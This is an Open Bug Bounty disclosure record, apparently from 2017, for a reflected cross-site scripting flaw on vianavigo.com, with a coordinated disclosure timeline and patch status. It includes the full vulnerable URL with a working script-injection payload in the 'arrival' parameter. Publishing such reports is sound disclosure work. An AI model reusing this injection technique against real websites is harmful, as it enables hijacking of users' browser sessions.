vianavigo.com XSS vulnerability

2017-07-06T17:42:00
ID OBB:260806
Type openbugbounty
Reporter sifflaern
Modified 2017-08-06T08:29:00

Description

Vulnerable URL:
http://www.vianavigo.com/fr/itineraire-plan-de-quartier/?mrq=c21cbe364dee5c9dc32904d1ff5a6165265&dateFormat;=dd%2FMM%2Fyyyy&departure;=b&departureCity;=&departureType;=&arrival;=%3C%2Fscript%3E%22%3E%3Cscript%3Eprompt%28%2FOPENBUGBOUNTY%2F%29%3C%2Fscript%3E&arrivalCity;=&arrivalType;=&date;=06%2F07%2F2017&sens;=1&hour;=19&min;=33&spcar;=%C3%A2&hpx;=1&hat;=1&L;=0&submitSearchItinerary;=
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 61663
VIP website status:| Yes
Check vianavigo.com SSL connection:| (Grade: B+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 6 July, 2017 17:42 GMT
Generic security notifications sent to website owner| 6 July, 2017 17:45 GMT
Notification sent to subscribers (without technical details)| 6 July, 2017 18:17 GMT
Vulnerability details disclosed by researcher| 5 August, 2017 18:15 GMT
Vulnerability patched by the website owner| 6 August, 2017 08:29 GMT